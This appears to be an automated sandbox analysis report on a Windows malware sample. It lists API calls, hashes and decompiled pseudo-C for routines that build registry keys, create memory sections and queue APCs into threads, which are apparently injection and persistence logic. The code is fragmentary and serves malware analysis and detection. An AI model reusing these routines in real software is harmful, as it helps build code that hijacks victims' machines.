                              • Instruction ID: 75245d50c457eb3b48c2bed684ad7ac4b18c51fb5e8e9762b694e887651eb081
                              • Opcode Fuzzy Hash: 37a417933cc3d5ab56ffc5e8660b08e38e3a5a9d3fcb2692b395bad732446ed0
                              • Instruction Fuzzy Hash: 2F2171B250160AAFDB50DF68DC44E6A7BFCEB48344B018635E50ACB258E774ED458B60
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                                • Part of subcall function 053D032D: RtlAllocateHeap.NTDLL(00000000,?,053E24D0), ref: 053D0339
                              • GetModuleHandleA.KERNEL32(?,00000020,?,?,?,?,?,?,053CD660,?,?,053D3C99,?,00000000), ref: 053C9729
                              • GetProcAddress.KERNEL32(00000000,?), ref: 053C974B
                              • GetProcAddress.KERNEL32(00000000,?), ref: 053C9761
                              • GetProcAddress.KERNEL32(00000000,?), ref: 053C9777
                              • GetProcAddress.KERNEL32(00000000,?), ref: 053C978D
                              • GetProcAddress.KERNEL32(00000000,?), ref: 053C97A3
                                • Part of subcall function 053D963A: NtCreateSection.NTDLL(053D3C99,000F001F,?,?,?,08000000,00000000,74784EE0,00000000,00000000), ref: 053D9697
                                • Part of subcall function 053D963A: memset.NTDLL ref: 053D96BB
                              Memory Dump Source
                              • Source File: 00000003.00000002.675063675.00000000053C0000.00000040.00020000.sdmp, Offset: 053C0000, based on PE: false
                              Similarity
                              • API ID: AddressProc$AllocateCreateHandleHeapModuleSectionmemset
                              • String ID:
                              • API String ID: 3012371009-0
                              • Opcode ID: b68bfb20410e34b7a7d7bffbb0c9c19ac4e97fcc8e01d487ec782d06109568c7
                              • Instruction ID: 496ddc3a70f90fbbfde38bb436fd80db6bd0eddee58860eb5927ef05186e1bbd
                              • Opcode Fuzzy Hash: b68bfb20410e34b7a7d7bffbb0c9c19ac4e97fcc8e01d487ec782d06109568c7
                              • Instruction Fuzzy Hash: D9212AB651120EEFD710DFA9DC89E5A7BECFB04340B01456AF806CB241E770EA008B70
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • CreateThread.KERNEL32(00000000,00000000,00000000,?,053F01F8,053C10B6), ref: 053C348C
                              • QueueUserAPC.KERNEL32(?,00000000,?), ref: 053C34A1
                              • GetLastError.KERNEL32(00000000), ref: 053C34AC
                              • TerminateThread.KERNEL32(00000000,00000000), ref: 053C34B6
                              • CloseHandle.KERNEL32(00000000), ref: 053C34BD
                              • SetLastError.KERNEL32(00000000), ref: 053C34C6
                              Memory Dump Source
                              • Source File: 00000003.00000002.675063675.00000000053C0000.00000040.00020000.sdmp, Offset: 053C0000, based on PE: false
                              Similarity
                              • API ID: ErrorLastThread$CloseCreateHandleQueueTerminateUser
                              • String ID:
                              • API String ID: 3832013932-0
                              • Opcode ID: 79dcb1adbc9198d28d2bea747772b88bf28d86af8a822923a1a33fc34544a8d1
                              • Instruction ID: 54462f50dcd36b27d3498e86436943e5afd368263cca93f02db401884d409c9e
                              • Opcode Fuzzy Hash: 79dcb1adbc9198d28d2bea747772b88bf28d86af8a822923a1a33fc34544a8d1
                              • Instruction Fuzzy Hash: 7BF01C72225221BFD7321FA4AC0EF5FBFADFF09751F418808F6059D190CB6589108BA1
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 88%
                              			E049D48E5(void* __ecx, char* _a8, char _a16, intOrPtr* _a20, char _a24) {
                              				signed int _v8;
                              				char _v12;
                              				signed int* _v16;
                              				char _v284;
                              				void* __esi;
                              				char* _t59;
                              				intOrPtr* _t60;
                              				void* _t62;
                              				intOrPtr _t64;
                              				char _t65;
                              				void* _t67;
                              				intOrPtr _t68;
                              				intOrPtr _t69;
                              				intOrPtr _t71;
                              				void* _t73;
                              				signed int _t81;
                              				void* _t91;
                              				void* _t92;
                              				char _t98;
                              				signed int* _t100;
                              				intOrPtr* _t101;
                              				void* _t102;
                              
                              				_t92 = __ecx;
                              				_v8 = _v8 & 0x00000000;
                              				_t98 = _a16;
                              				if(_t98 == 0) {
                              					__imp__( &_v284,  *0x49dd36c);
                              					_t91 = 0x80000002;
                              					L6:
                              					_t59 = E049D65F6( &_v284,  &_v284);
                              					_a8 = _t59;
                              					if(_t59 == 0) {
                              						_v8 = 8;
                              						L29:
                              						_t60 = _a20;
                              						if(_t60 != 0) {
                              							 *_t60 =  *_t60 + 1;
                              						}
                              						return _v8;
                              					}
                              					_t101 = _a24;
                              					_t62 = E049D691B(_t92, _t97, _t101, _t91, _t59); // executed
                              					if(_t62 != 0) {
                              						L27:
                              						E049D6DFA(_a8);
                              						goto L29;
                              					}
                              					_t64 =  *0x49dd2b0; // 0x5819b78
                              					_t16 = _t64 + 0xc; // 0x5819c46
                              					_t65 = E049D65F6(_t64,  *_t16);
                              					_a24 = _t65;
                              					if(_t65 == 0) {
                              						L14:
                              						_t29 = _t101 + 0x14; // 0x102
                              						_t33 = _t101 + 0x10; // 0x3d049dc0, executed
                              						_t67 = E049D6E41(_t97,  *_t33, _t91, _a8,  *0x49dd364,  *((intOrPtr*)( *_t29 + 0x28)),  *((intOrPtr*)( *_t29 + 0x2c))); // executed
                              						if(_t67 == 0) {
                              							_t68 =  *0x49dd2b8; // 0xe3a5a8
                              							if(_t98 == 0) {
                              								_t35 = _t68 + 0x49dea23; // 0x4d4c4b48
                              								_t69 = _t35;
                              							} else {
                              								_t34 = _t68 + 0x49de8cb; // 0x55434b48
                              								_t69 = _t34;
                              							}
                              							if(E049D5D44(_t69,  *0x49dd364,  *0x49dd368,  &_a24,  &_a16) == 0) {
                              								if(_t98 == 0) {
                              									_t71 =  *0x49dd2b8; // 0xe3a5a8
                              									_t44 = _t71 + 0x49de83e; // 0x74666f53
                              									_t73 = E049D65F6(_t44, _t44);
                              									_t99 = _t73;
                              									if(_t73 == 0) {
                              										_v8 = 8;
                              									} else {
                              										_t47 = _t101 + 0x10; // 0x3d049dc0
                              										E049D4FA0( *_t47, _t91, _a8,  *0x49dd368, _a24);
                              										_t49 = _t101 + 0x10; // 0x3d049dc0
                              										E049D4FA0( *_t49, _t91, _t99,  *0x49dd360, _a16);
                              										E049D6DFA(_t99);
                              									}
                              								} else {
                              									_t40 = _t101 + 0x10; // 0x3d049dc0
                              									E049D4FA0( *_t40, _t91, _a8,  *0x49dd368, _a24);
                              									_t43 = _t101 + 0x10; // 0x3d049dc0, executed
                              									E049D4FA0( *_t43, _t91, _a8,  *0x49dd360, _a16); // executed
                              								}
                              								if( *_t101 != 0) {
                              									E049D6DFA(_a24);
                              								} else {
                              									 *_t101 = _a16;
                              								}
                              							}
                              						}
                              						goto L27;
                              					}
                              					_t21 = _t101 + 0x10; // 0x3d049dc0, executed
                              					_t81 = E049D5607( *_t21, _t91, _a8, _t65,  &_v16,  &_v12); // executed
                              					if(_t81 == 0) {
                              						_t100 = _v16;
                              						if(_v12 == 0x28) {
                              							 *_t100 =  *_t100 & _t81;
                              							_t26 = _t101 + 0x10; // 0x3d049dc0
                              							E049D6E41(_t97,  *_t26, _t91, _a8, _a24, _t100, 0x28);
                              						}
                              						E049D6DFA(_t100);
                              						_t98 = _a16;
                              					}
                              					E049D6DFA(_a24);
                              					goto L14;
                              				}
                              				if(_t98 <= 8 || _t98 + 0x2a >= 0x104 || StrChrA(_a8, 0x5f) != 0) {
                              					goto L29;
                              				} else {
                              					_t97 = _a8;
                              					E049DAA99(_t98, _a8,  &_v284);
                              					__imp__(_t102 + _t98 - 0x117,  *0x49dd36c);
                              					 *((char*)(_t102 + _t98 - 0x118)) = 0x5c;
                              					_t91 = 0x80000003;
                              					goto L6;
                              				}
                              			}

                              APIs
                              • StrChrA.SHLWAPI(049D6096,0000005F,00000000,00000000,00000104), ref: 049D4918
                              • lstrcpy.KERNEL32(?,?), ref: 049D4945
                                • Part of subcall function 049D65F6: lstrlen.KERNEL32(?,00000000,05819B78,00000000,049D25B8,05819D56,69B25F44,?,?,?,?,69B25F44,00000005,049DD00C,4D283A53,?), ref: 049D65FD
                                • Part of subcall function 049D65F6: mbstowcs.NTDLL ref: 049D6626
                                • Part of subcall function 049D65F6: memset.NTDLL ref: 049D6638
                                • Part of subcall function 049D4FA0: lstrlenW.KERNEL32(?,?,?,049D4AAE,3D049DC0,80000002,049D6096,049DA6E1,74666F53,4D4C4B48,049DA6E1,?,3D049DC0,80000002,049D6096,?), ref: 049D4FC5
                                • Part of subcall function 049D6DFA: RtlFreeHeap.NTDLL(00000000,00000000,049D55CD,00000000,?,?,00000000), ref: 049D6E06
                              • lstrcpy.KERNEL32(?,00000000), ref: 049D4967
                              Strings
                              Memory Dump Source
                              • Source File: 00000003.00000002.674779449.00000000049D1000.00000020.00020000.sdmp, Offset: 049D0000, based on PE: true
                              • Associated: 00000003.00000002.674748179.00000000049D0000.00000004.00020000.sdmp
                              • Associated: 00000003.00000002.674876280.00000000049DC000.00000002.00020000.sdmp
                              • Associated: 00000003.00000002.674899025.00000000049DD000.00000004.00020000.sdmp
                              • Associated: 00000003.00000002.674917059.00000000049DF000.00000002.00020000.sdmp
                              Similarity
                              • API ID: lstrcpylstrlen$FreeHeapmbstowcsmemset
                              • String ID: ($\
                              • API String ID: 3924217599-1512714803
                              • Opcode ID: 74bf0088f52e52c52386c5cb5aaa70be6ef35559aa908e8dd950438a1f5fb1a5
                              • Instruction ID: 3b7aa9e6bfdad8a8d9219bac2b1b7c423d1b2e17266e07be63f40bd9d7f4307b
                              • Opcode Fuzzy Hash: 74bf0088f52e52c52386c5cb5aaa70be6ef35559aa908e8dd950438a1f5fb1a5
                              • Instruction Fuzzy Hash: 5A51273610420AEFEF119FA4DD40EAA7BBAFB48358F10C634FA1596160E735ED65DB10
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 053D15E7
                                • Part of subcall function 053D8E6E: RtlEnterCriticalSection.NTDLL(00000000), ref: 053D8E7A
                                • Part of subcall function 053D8E6E: CloseHandle.KERNEL32(?), ref: 053D8E88
                                • Part of subcall function 053D8E6E: RtlLeaveCriticalSection.NTDLL(00000000), ref: 053D8EA4
                              • CloseHandle.KERNEL32(?), ref: 053D15F5
                              • InterlockedDecrement.KERNEL32(053F00BC), ref: 053D1604
                                • Part of subcall function 053E2501: SetEvent.KERNEL32(0000010C,053D161F), ref: 053E250B
                                • Part of subcall function 053E2501: CloseHandle.KERNEL32(0000010C), ref: 053E2520
                                • Part of subcall function 053E2501: HeapDestroy.KERNELBASE(06100000), ref: 053E2530
                              • RtlExitUserThread.NTDLL(00000000), ref: 053D1620
                              Strings
                              Memory Dump Source
                              • Source File: 00000003.00000002.675063675.00000000053C0000.00000040.00020000.sdmp, Offset: 053C0000, based on PE: false
                              Similarity
                              • API ID: CloseHandle$CriticalSection$DecrementDestroyEnterEventExitHeapInterlockedLeaveMultipleObjectsThreadUserWait
                              • String ID: t
                              • API String ID: 1141245775-2238339752
                              • Opcode ID: bc938962c755be76eca07ac2abe1acd4d3d18753ee752a758c3924f7d3b5b2db
                              • Instruction ID: 97d7600230654abf20618ac8a7afe80089a5f2505adcd2ffb15bcbf5f5a330b5
                              • Opcode Fuzzy Hash: bc938962c755be76eca07ac2abe1acd4d3d18753ee752a758c3924f7d3b5b2db
                              • Instruction Fuzzy Hash: ADF0C835650200ABC7165F68DC4EEAEBFBDEB41730F110208FA258B2C0DF795D018BA0
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 50%
                              			E049D3A19(void** __esi) {
                              				intOrPtr _v0;
                              				intOrPtr _t4;
                              				intOrPtr _t6;
                              				void* _t8;
                              				void* _t9;
                              				intOrPtr _t10;
                              				void* _t11;
                              				void** _t13;
                              
                              				_t13 = __esi;
                              				_t4 =  *0x49dd35c; // 0x58195b0
                              				__imp__(_t4 + 0x40);
                              				while(1) {
                              					_t6 =  *0x49dd35c; // 0x58195b0
                              					_t1 = _t6 + 0x58; // 0x0
                              					if( *_t1 == 0) {
                              						break;
                              					}
                              					Sleep(0xa);
                              				}
                              				_t8 =  *_t13;
                              				if(_t8 != 0 && _t8 != 0x49dd030) {
                              					HeapFree( *0x49dd270, 0, _t8);
                              				}
                              				_t9 = E049D311C(_v0, _t13); // executed
                              				_t13[1] = _t9;
                              				_t10 =  *0x49dd35c; // 0x58195b0
                              				_t11 = _t10 + 0x40;
                              				__imp__(_t11);
                              				return _t11;
                              			}

                              APIs
                              • RtlEnterCriticalSection.NTDLL(05819570), ref: 049D3A22
                              • Sleep.KERNEL32(0000000A), ref: 049D3A2C
                              • HeapFree.KERNEL32(00000000,00000000), ref: 049D3A54
                              • RtlLeaveCriticalSection.NTDLL(05819570), ref: 049D3A70
                              Strings
                              Memory Dump Source
                              • Source File: 00000003.00000002.674779449.00000000049D1000.00000020.00020000.sdmp, Offset: 049D0000, based on PE: true
                              • Associated: 00000003.00000002.674748179.00000000049D0000.00000004.00020000.sdmp
                              • Associated: 00000003.00000002.674876280.00000000049DC000.00000002.00020000.sdmp
                              • Associated: 00000003.00000002.674899025.00000000049DD000.00000004.00020000.sdmp
                              • Associated: 00000003.00000002.674917059.00000000049DF000.00000002.00020000.sdmp
                              Similarity
                              • API ID: CriticalSection$EnterFreeHeapLeaveSleep
                              • String ID: Uxt
                              • API String ID: 58946197-1536154274
                              • Opcode ID: 3f5a02c7657c005c1bde881033b684c738da145623adabbd48fcab8080c9635a
                              • Instruction ID: 4079eff03c579e9b7107991f5a52af596284483010853a2da999f760dfa250ee
                              • Opcode Fuzzy Hash: 3f5a02c7657c005c1bde881033b684c738da145623adabbd48fcab8080c9635a
                              • Instruction Fuzzy Hash: A3F0FE7430A241EFEB209F69ED48F167FA8EF21349B08C535F901D6290D628EC84CB16
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 57%
                              			E049D587D(signed int __edx) {
                              				signed int _v8;
                              				long _v12;
                              				CHAR* _v16;
                              				long _v20;
                              				void* __ebx;
                              				void* __edi;
                              				void* __esi;
                              				void* _t21;
                              				CHAR* _t22;
                              				CHAR* _t25;
                              				intOrPtr _t26;
                              				void* _t27;
                              				void* _t31;
                              				void* _t32;
                              				CHAR* _t36;
                              				CHAR* _t42;
                              				CHAR* _t43;
                              				CHAR* _t44;
                              				void* _t49;
                              				void* _t51;
                              				signed char _t56;
                              				intOrPtr _t58;
                              				signed int _t59;
                              				void* _t63;
                              				CHAR* _t67;
                              				CHAR* _t68;
                              				char* _t69;
                              				void* _t70;
                              
                              				_t61 = __edx;
                              				_v20 = 0;
                              				_v8 = 0;
                              				_v12 = 0;
                              				_t21 = E049D6DCB();
                              				if(_t21 != 0) {
                              					_t59 =  *0x49dd294; // 0x4000000a
                              					_t55 = (_t59 & 0xf0000000) + _t21;
                              					 *0x49dd294 = (_t59 & 0xf0000000) + _t21;
                              				}
                              				_t22 =  *0x49dd12c(0, 2);
                              				_v16 = _t22;
                              				if(_t22 == 0 || _t22 == 1 || _t22 == 0x80010106) {
                              					_t25 = E049D5203( &_v8,  &_v20); // executed
                              					_t54 = _t25;
                              					_t26 =  *0x49dd2b8; // 0xe3a5a8
                              					if( *0x49dd294 > 5) {
                              						_t8 = _t26 + 0x49de5cd; // 0x4d283a53
                              						_t27 = _t8;
                              					} else {
                              						_t7 = _t26 + 0x49de9d9; // 0x44283a44
                              						_t27 = _t7;
                              					}
                              					E049D3D42(_t27, _t27);
                              					_t31 = E049D5C7F(_t61,  &_v20,  &_v12); // executed
                              					if(_t31 == 0) {
                              						CloseHandle(_v20);
                              					}
                              					_t63 = 5;
                              					if(_t54 != _t63) {
                              						 *0x49dd2a8 =  *0x49dd2a8 ^ 0x81bbe65d;
                              						_t32 = E049D55DC(0x60);
                              						__eflags = _t32;
                              						 *0x49dd35c = _t32;
                              						if(_t32 == 0) {
                              							_push(8);
                              							_pop(0);
                              						} else {
                              							memset(_t32, 0, 0x60);
                              							_t49 =  *0x49dd35c; // 0x58195b0
                              							_t70 = _t70 + 0xc;
                              							__imp__(_t49 + 0x40);
                              							_t51 =  *0x49dd35c; // 0x58195b0
                              							 *_t51 = 0x49de823;
                              						}
                              						__eflags = 0;
                              						_t54 = 0;
                              						if(0 == 0) {
                              							_t36 = RtlAllocateHeap( *0x49dd270, 0, 0x43);
                              							__eflags = _t36;
                              							 *0x49dd300 = _t36;
                              							if(_t36 == 0) {
                              								_push(8);
                              								_pop(0);
                              							} else {
                              								_t56 =  *0x49dd294; // 0x4000000a
                              								_t61 = _t56 & 0x000000ff;
                              								_t58 =  *0x49dd2b8; // 0xe3a5a8
                              								_t13 = _t58 + 0x49de55a; // 0x697a6f4d
                              								_t55 = _t13;
                              								wsprintfA(_t36, _t13, _t56 & 0x000000ff, _t56 & 0x000000ff, 0x49dc2a7);
                              							}
                              							__eflags = 0;
                              							_t54 = 0;
                              							if(0 == 0) {
                              								asm("sbb eax, eax");
                              								E049DA303( ~_v8 &  *0x49dd2a8, 0x49dd00c); // executed
                              								_t42 = E049D294D(0, _t55, _t63, 0x49dd00c); // executed
                              								_t54 = _t42;
                              								__eflags = _t54;
                              								if(_t54 != 0) {
                              									goto L30;
                              								}
                              								_t43 = E049D2551();
                              								__eflags = _t43;
                              								if(_t43 != 0) {
                              									__eflags = _v8;
                              									_t67 = _v12;
                              									if(_v8 != 0) {
                              										L29:
                              										_t44 = E049D5038(_t61, _t67, _v8); // executed
                              										_t54 = _t44;
                              										goto L30;
                              									}
                              									__eflags = _t67;
                              									if(__eflags == 0) {
                              										goto L30;
                              									}
                              									_t54 = E049D8BA7(__eflags,  &(_t67[4]));
                              									__eflags = _t54;
                              									if(_t54 == 0) {
                              										goto L30;
                              									}
                              									goto L29;
                              								}
                              								_t54 = 8;
                              							}
                              						}
                              					} else {
                              						_t68 = _v12;
                              						if(_t68 == 0) {
                              							L30:
                              							if(_v16 == 0 || _v16 == 1) {
                              								 *0x49dd128(); // executed
                              							}
                              							goto L34;
                              						}
                              						_t69 =  &(_t68[4]);
                              						do {
                              						} while (E049D62E1(_t63, _t69, 0, 1) == 0x4c7);
                              					}
                              					goto L30;
                              				} else {
                              					_t54 = _t22;
                              					L34:
                              					return _t54;
                              				}
                               			}

                               Instruction addresses (the report's per-line address column, collapsed): 0x049d587d to 0x049d5a57; entries of 0x00000000 mark decompiled lines with no address.

                              APIs
                                • Part of subcall function 049D6DCB: GetModuleHandleA.KERNEL32(4C44544E,00000000,049D5895,00000001), ref: 049D6DDA
                              • CloseHandle.KERNEL32(?,?,?,4D283A53,?,?), ref: 049D5912
                                • Part of subcall function 049D55DC: RtlAllocateHeap.NTDLL(00000000,00000000,049D552C), ref: 049D55E8
                              • memset.NTDLL ref: 049D5962
                              • RtlInitializeCriticalSection.NTDLL(05819570), ref: 049D5973
                                • Part of subcall function 049D8BA7: memset.NTDLL ref: 049D8BC1
                                • Part of subcall function 049D8BA7: lstrlenW.KERNEL32(00000000,00410025,00000005,?,00000000), ref: 049D8C07
                                • Part of subcall function 049D8BA7: StrCmpNIW.SHLWAPI(00000000,?,00000000), ref: 049D8C12
                              • RtlAllocateHeap.NTDLL(00000000,00000043,00000060), ref: 049D599E
                              • wsprintfA.USER32 ref: 049D59CE
                              Memory Dump Source
                              • Source File: 00000003.00000002.674779449.00000000049D1000.00000020.00020000.sdmp, Offset: 049D0000, based on PE: true
                               • Associated: 00000003.00000002.674748179.00000000049D0000.00000004.00020000.sdmp
                               • Associated: 00000003.00000002.674876280.00000000049DC000.00000002.00020000.sdmp
                               • Associated: 00000003.00000002.674899025.00000000049DD000.00000004.00020000.sdmp
                               • Associated: 00000003.00000002.674917059.00000000049DF000.00000002.00020000.sdmp
                              Similarity
                              • API ID: AllocateHandleHeapmemset$CloseCriticalInitializeModuleSectionlstrlenwsprintf
                              • String ID:
                              • API String ID: 4246211962-0
                              • Opcode ID: 6e7fa1c00e5d3f6b7db978954d9ae718781fddd65f42a697e6730106c441f1d3
                              • Instruction ID: bf80d7eebb5ba7dd160914c1c7df986eab300943d12b1c637392aa593c03b83d
                              • Opcode Fuzzy Hash: 6e7fa1c00e5d3f6b7db978954d9ae718781fddd65f42a697e6730106c441f1d3
                              • Instruction Fuzzy Hash: 8151D471A52225BBFB109FE4DC84A6E7BADEB14728F05C936E101E7140E678F9808B90
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 100%
                              			E049D4B5B(signed int _a4, signed int* _a8) {
                              				void* __ecx;
                              				void* __edi;
                              				signed int _t6;
                              				intOrPtr _t8;
                              				intOrPtr _t12;
                              				long _t14;
                              				void* _t18;
                              				WCHAR* _t19;
                              				long _t20;
                              				void* _t25;
                              				void* _t26;
                              				signed int* _t28;
                              				CHAR* _t30;
                              				long _t31;
                              				WCHAR** _t32;
                              
                              				_t6 =  *0x49dd2a8; // 0xd448b889
                              				_t32 = _a4;
                              				_a4 = _t6 ^ 0x109a6410;
                              				_t8 =  *0x49dd2b8; // 0xe3a5a8
                              				_t3 = _t8 + 0x49de876; // 0x61636f4c
                              				_t25 = 0;
                              				_t30 = E049D760A(_t3, 1);
                              				if(_t30 != 0) {
                              					_t25 = CreateEventA(0x49dd2e4, 1, 0, _t30);
                              					E049D6DFA(_t30);
                              				}
                              				_t12 =  *0x49dd294; // 0x4000000a
                              				if(_t12 <= 5 || _t12 == 6 && _t12 >= 2 ||  *_t32 == 0) {
                              					L12:
                              					_t28 = _a8;
                              					if(_t28 != 0) {
                              						 *_t28 =  *_t28 | 0x00000001;
                              					}
                              					_t14 = E049D87A1(_t32, _t26); // executed
                              					_t31 = _t14;
                              					if(_t31 == 0 && _t25 != 0) {
                              						_t31 = WaitForSingleObject(_t25, 0x4e20);
                              					}
                              					if(_t28 != 0 && _t31 != 0) {
                              						 *_t28 =  *_t28 & 0xfffffffe;
                              					}
                              					goto L20;
                              				} else {
                              					_t18 = E049D3309(); // executed
                              					if(_t18 != 0) {
                              						goto L12;
                              					}
                              					_t19 = StrChrW( *_t32, 0x20);
                              					if(_t19 != 0) {
                              						 *_t19 = 0;
                              						_t19 =  &(_t19[1]);
                              					}
                              					_t20 = E049D62E1(0,  *_t32, _t19, 0); // executed
                              					_t31 = _t20;
                              					if(_t31 == 0) {
                              						if(_t25 == 0) {
                              							L22:
                              							return _t31;
                              						}
                              						_t31 = WaitForSingleObject(_t25, 0x4e20);
                              						if(_t31 == 0) {
                              							L20:
                              							if(_t25 != 0) {
                              								CloseHandle(_t25);
                              							}
                              							goto L22;
                              						}
                              					}
                              					goto L12;
                              				}
                               			}

                               Instruction addresses (the report's per-line address column, collapsed): 0x049d4b5c to 0x049d4c4d; entries of 0x00000000 mark decompiled lines with no address.

                              APIs
                                • Part of subcall function 049D760A: lstrlen.KERNEL32(00000005,00000000,69B25F44,00000027,00000000,05819B78,00000000,?,?,69B25F44,00000005,049DD00C,4D283A53,?,?), ref: 049D7640
                                • Part of subcall function 049D760A: lstrcpy.KERNEL32(00000000,00000000), ref: 049D7664
                                • Part of subcall function 049D760A: lstrcat.KERNEL32(00000000,00000000), ref: 049D766C
                              • CreateEventA.KERNEL32(049DD2E4,00000001,00000000,00000000,61636F4C,00000001,00000000,?,?,00000000,?,049D60B5,?,?,?), ref: 049D4B9C
                                • Part of subcall function 049D6DFA: RtlFreeHeap.NTDLL(00000000,00000000,049D55CD,00000000,?,?,00000000), ref: 049D6E06
                              • StrChrW.SHLWAPI(049D60B5,00000020,61636F4C,00000001,00000000,?,?,00000000,?,049D60B5,?,?,?), ref: 049D4BCF
                              • WaitForSingleObject.KERNEL32(00000000,00004E20,049D60B5,00000000,00000000,?,00000000,?,049D60B5,?,?,?), ref: 049D4BFA
                              • WaitForSingleObject.KERNEL32(00000000,00004E20,61636F4C,00000001,00000000,?,?,00000000,?,049D60B5,?,?,?), ref: 049D4C28
                              • CloseHandle.KERNEL32(00000000,61636F4C,00000001,00000000,?,?,00000000,?,049D60B5,?,?,?), ref: 049D4C40
                              Memory Dump Source
                              • Source File: 00000003.00000002.674779449.00000000049D1000.00000020.00020000.sdmp, Offset: 049D0000, based on PE: true
                               • Associated: 00000003.00000002.674748179.00000000049D0000.00000004.00020000.sdmp
                               • Associated: 00000003.00000002.674876280.00000000049DC000.00000002.00020000.sdmp
                               • Associated: 00000003.00000002.674899025.00000000049DD000.00000004.00020000.sdmp
                               • Associated: 00000003.00000002.674917059.00000000049DF000.00000002.00020000.sdmp
                              Similarity
                              • API ID: ObjectSingleWait$CloseCreateEventFreeHandleHeaplstrcatlstrcpylstrlen
                              • String ID:
                              • API String ID: 73268831-0
                              • Opcode ID: 830ed637fd74ad55f97e49c38dbed27f82ec8e2d39b9a67439aa6287e8f3b084
                              • Instruction ID: d8db8433f8345b549ddc116afe720b7d0296b1448e200f992d91af5e7fb05fbc
                              • Opcode Fuzzy Hash: 830ed637fd74ad55f97e49c38dbed27f82ec8e2d39b9a67439aa6287e8f3b084
                              • Instruction Fuzzy Hash: 712147726013116BE7319FB89D89AAB779DEF88711B098334FE46EB100EB78FC418654
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                                • Part of subcall function 053D64DE: RegCreateKeyA.ADVAPI32(80000001,064FB7F0,064F8578), ref: 053D64F3
                                • Part of subcall function 053D64DE: lstrlen.KERNEL32(064FB7F0,00000000,00000000,053EF072,?,?,?,053CFFEA,00000001,00000001,064F8578), ref: 053D651C
                              • RegQueryValueExA.KERNEL32(?,?,00000000,?,00000000,?,?,00000000,?,?,?,?,?,?,053C3136,?), ref: 053E3337
                              • RtlAllocateHeap.NTDLL(00000000,?), ref: 053E334B
                              • RegQueryValueExA.ADVAPI32(?,?,00000000,?,00000000,?,?,00000000,?,?,?,?,?,?,053C3136,?), ref: 053E3365
                              • HeapFree.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,053C3136,?,?,?), ref: 053E3381
                              • RegCloseKey.ADVAPI32(?,?,00000000,?,?,?,?,?,?,053C3136,?,?,?), ref: 053E338F
                              Memory Dump Source
                              • Source File: 00000003.00000002.675063675.00000000053C0000.00000040.00020000.sdmp, Offset: 053C0000, based on PE: false
                              Similarity
                              • API ID: HeapQueryValue$AllocateCloseCreateFreelstrlen
                              • String ID:
                              • API String ID: 1633053242-0
                              • Opcode ID: aa82bd2b449318c49d45c3709fa3ce1459036b8e62d640b7c1838e73ac795672
                              • Instruction ID: f7218f4230d4f6c1389c914fc58019cde4f15696410e7bff38cb28ae64b4a188
                              • Opcode Fuzzy Hash: aa82bd2b449318c49d45c3709fa3ce1459036b8e62d640b7c1838e73ac795672
                              • Instruction Fuzzy Hash: EC114CB6510119FFDB119F98DC89CAEBFBEFB88354B11042AF5019B190DB71AD50DB60
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 49%
                              			E049D2EBD(void* __ecx, void* __edi, intOrPtr _a4) {
                              				unsigned int _v8;
                              				void* _v12;
                              				long _t15;
                              				long _t16;
                              				signed int _t18;
                              				signed int _t19;
                              				unsigned int _t21;
                              				unsigned int _t26;
                              
                              				asm("stosd");
                              				_v12 = _v12 | 0xffffffff;
                              				while(1) {
                              					_t15 = QueueUserAPC(E049D293E, GetCurrentThread(),  &_v12); // executed
                              					if(_t15 == 0) {
                              						break;
                              					}
                              					_t26 = _v8;
                              					_t18 = (_t26 << 0x00000020 | _v12) >> 5;
                              					_push(0);
                              					_push(0x13);
                              					_push(_t26 >> 5);
                              					_push(_t18);
                              					L049DB18E();
                              					_push(1);
                              					_t19 = 3;
                              					_t21 = SleepEx(_t19 << (_t18 & 0x00000007), ??); // executed
                              					_t16 = E049D54DF(_a4, (_t21 >> 6) + _t18);
                              					if(_t16 == 1) {
                              						continue;
                              					} else {
                              					}
                              					L5:
                              					return _t16;
                              				}
                              				_t16 = GetLastError();
                              				goto L5;
                               			}

                               Instruction addresses (the report's per-line address column, collapsed): 0x049d2ec8 to 0x049d2f33; entries of 0x00000000 mark decompiled lines with no address.

                              APIs
                              • GetCurrentThread.KERNEL32 ref: 049D2ED3
                              • QueueUserAPC.KERNEL32(049D293E,00000000,?,?,?,049D2348,?,?), ref: 049D2EDF
                              • _aullrem.NTDLL(000000FF,?,00000013,00000000), ref: 049D2EFC
                              • SleepEx.KERNEL32(00000003,00000001,?,?,?,049D2348,?,?), ref: 049D2F10
                                • Part of subcall function 049D54DF: memcpy.NTDLL(00000000,?,?,?,?,?,?,?,00000000), ref: 049D553E
                              • GetLastError.KERNEL32(?,?,?,049D2348,?,?), ref: 049D2F2B
                              Memory Dump Source
                              • Source File: 00000003.00000002.674779449.00000000049D1000.00000020.00020000.sdmp, Offset: 049D0000, based on PE: true
                               • Associated: 00000003.00000002.674748179.00000000049D0000.00000004.00020000.sdmp
                               • Associated: 00000003.00000002.674876280.00000000049DC000.00000002.00020000.sdmp
                               • Associated: 00000003.00000002.674899025.00000000049DD000.00000004.00020000.sdmp
                               • Associated: 00000003.00000002.674917059.00000000049DF000.00000002.00020000.sdmp
                              Similarity
                              • API ID: CurrentErrorLastQueueSleepThreadUser_aullremmemcpy
                              • String ID:
                              • API String ID: 2952296216-0
                              • Opcode ID: c0c6c01eeb5b43a236d6767109d6339b6f020188d4fe0794eeb05f43ad726b6a
                              • Instruction ID: 2803912ed4d985995c5c9bc22914ccaa6b3730e5b5c7cf46ac42ffe809ba8864
                              • Opcode Fuzzy Hash: c0c6c01eeb5b43a236d6767109d6339b6f020188d4fe0794eeb05f43ad726b6a
                              • Instruction Fuzzy Hash: FF018BB2650104BBEB145BE4DC5EFAEBB6CEB45750F104575F602D6180E5B4EA40C761
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • VirtualProtect.KERNEL32(?,?,00000040,00000000,011075A8,?,00000000,011075A8,?,053CB24B,00000004,00000000), ref: 053E4EA3
